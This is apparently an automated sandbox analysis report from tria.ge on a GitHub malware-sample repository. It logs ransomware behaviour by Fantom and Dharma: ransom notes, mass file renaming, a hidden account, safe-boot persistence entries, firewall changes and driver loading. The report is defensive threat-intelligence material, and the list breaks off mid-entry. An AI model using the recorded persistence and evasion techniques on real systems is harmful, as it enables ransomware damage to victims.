Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
17/01/2025, 00:09
250117-afkm7swnek 1017/01/2025, 00:03
250117-acf6lsvqbw 817/01/2025, 00:00
250117-aae6javpes 10Analysis
-
max time kernel
98s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/01/2025, 00:00
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo
Malware Config
Extracted
C:\PerfLogs\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\Lang\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML
Extracted
C:\$Recycle.Bin\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML
Signatures
-
Fantom
Ransomware which hides encryption process behind fake Windows Update screen.
-
Fantom family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 3100 net.exe 4388 net1.exe -
Renames multiple (159) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4548 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5388 attrib.exe -
Sets service image path in registry 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\gfwzcxvawuujgazo\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\gfwzcxvawuujgazo.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\saeexgimvlfstdguz\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\saeexgimvlfstdguz.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tvhancemgjyrxfq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\tvhancemgjyrxfq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vzeyubktwqevus\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\vzeyubktwqevus.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\fpoeidqgfaiasixb\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\fpoeidqgfaiasixb.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qtozzxugfzocmzwn\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\qtozzxugfzocmzwn.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zcrbyzmgjqbzxkhdc\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\zcrbyzmgjqbzxkhdc.sys" mssql.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Dharma.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Fantom.exe -
Executes dropped EXE 17 IoCs
pid Process 1804 Fantom.exe 5508 Fantom.exe 6036 Fantom.exe 744 Fantom.exe 5824 Fantom.exe 5188 Fantom.exe 5688 Fantom.exe 5124 Fantom.exe 5624 Fantom.exe 5988 Fantom.exe 5832 Fantom.exe 5864 Dharma.exe 1388 nc123.exe 2332 mssql.exe 1292 mssql2.exe 5496 SearchHost.exe 4124 WindowsUpdate.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 14 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\FPOEIDQGFAIASIXB.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\qtozzxugfzocmzwn.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\QTOZZXUGFZOCMZWN.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\VZEYUBKTWQEVUS.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\gfwzcxvawuujgazo.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\saeexgimvlfstdguz.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\TVHANCEMGJYRXFQ.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\GFWZCXVAWUUJGAZO.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\tvhancemgjyrxfq.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\fpoeidqgfaiasixb.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vzeyubktwqevus.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\SAEEXGIMVLFSTDGUZ.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\zcrbyzmgjqbzxkhdc.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ZCRBYZMGJQBZXKHDC.SYS mssql.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: SearchHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 62 raw.githubusercontent.com 63 raw.githubusercontent.com -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_ca.xml Fantom.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\Stationery\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\ClientEventLogMessages.man Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Triedit\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipsen.xml Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ja-jp-sym.xml Fantom.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\da-DK\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\TextConv\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\System\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\symbase.xml Fantom.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base.xml Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\baseAltGr_rtl.xml Fantom.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\oskmenubase.xml Fantom.exe File opened for modification C:\Program Files\Common Files\System\ado\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\ClientEventLogMessages.man Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ro-RO\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\zh-TW\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipstr.xml Fantom.exe File created C:\Program Files\7-Zip\Lang\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\ClientCapabilities.json Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ru-RU\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\OFFICE16\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\he-IL\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main.xml Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\lv-LV\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\dotnet\host\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ko-KR\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipsnld.xml Fantom.exe File opened for modification C:\Program Files\Common Files\System\ado\it-IT\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipsrom.xml Fantom.exe File opened for modification C:\Program Files\NewComplete.dotm Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\kor-kor.xml Fantom.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipsfra.xml Fantom.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Source Engine\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\bg-BG\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ro-RO\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\Common Files\System\ado\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt Fantom.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl\DECRYPT_YOUR_FILES.HTML Fantom.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3872 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SearchHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dharma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mssql2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nc123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings msedge.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 153144.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 4387.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 646.crdownload:SmartScreen msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 4088 msedge.exe 4088 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3444 identity_helper.exe 3444 identity_helper.exe 2816 msedge.exe 2816 msedge.exe 4844 msedge.exe 4844 msedge.exe 5576 msedge.exe 5576 msedge.exe 1804 Fantom.exe 1804 Fantom.exe 5508 Fantom.exe 5508 Fantom.exe 6036 Fantom.exe 6036 Fantom.exe 744 Fantom.exe 744 Fantom.exe 5824 Fantom.exe 5824 Fantom.exe 5188 Fantom.exe 5188 Fantom.exe 5688 Fantom.exe 5688 Fantom.exe 5124 Fantom.exe 5124 Fantom.exe -
Suspicious behavior: LoadsDriver 32 IoCs
pid Process 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe 2332 mssql.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1804 Fantom.exe Token: SeDebugPrivilege 5508 Fantom.exe Token: SeDebugPrivilege 6036 Fantom.exe Token: SeDebugPrivilege 744 Fantom.exe Token: SeDebugPrivilege 5824 Fantom.exe Token: SeDebugPrivilege 5188 Fantom.exe Token: SeDebugPrivilege 5688 Fantom.exe Token: SeDebugPrivilege 5124 Fantom.exe Token: SeDebugPrivilege 5624 Fantom.exe Token: SeDebugPrivilege 5988 Fantom.exe Token: SeDebugPrivilege 5832 Fantom.exe Token: SeDebugPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeDebugPrivilege 1292 mssql2.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeLoadDriverPrivilege 2332 mssql.exe Token: SeIncreaseQuotaPrivilege 5732 WMIC.exe Token: SeSecurityPrivilege 5732 WMIC.exe Token: SeTakeOwnershipPrivilege 5732 WMIC.exe Token: SeLoadDriverPrivilege 5732 WMIC.exe Token: SeSystemProfilePrivilege 5732 WMIC.exe Token: SeSystemtimePrivilege 5732 WMIC.exe Token: SeProfSingleProcessPrivilege 5732 WMIC.exe Token: SeIncBasePriorityPrivilege 5732 WMIC.exe Token: SeCreatePagefilePrivilege 5732 WMIC.exe Token: SeBackupPrivilege 5732 WMIC.exe Token: SeRestorePrivilege 5732 WMIC.exe Token: SeShutdownPrivilege 5732 WMIC.exe Token: SeDebugPrivilege 5732 WMIC.exe Token: SeSystemEnvironmentPrivilege 5732 WMIC.exe Token: SeRemoteShutdownPrivilege 5732 WMIC.exe Token: SeUndockPrivilege 5732 WMIC.exe Token: SeManageVolumePrivilege 5732 WMIC.exe Token: 33 5732 WMIC.exe Token: 34 5732 WMIC.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 5496 SearchHost.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 5496 SearchHost.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2332 mssql.exe 1292 mssql2.exe 5496 SearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3344 wrote to memory of 3512 3344 msedge.exe 83 PID 3344 wrote to memory of 3512 3344 msedge.exe 83 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 2648 3344 msedge.exe 84 PID 3344 wrote to memory of 4088 3344 msedge.exe 85 PID 3344 wrote to memory of 4088 3344 msedge.exe 85 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 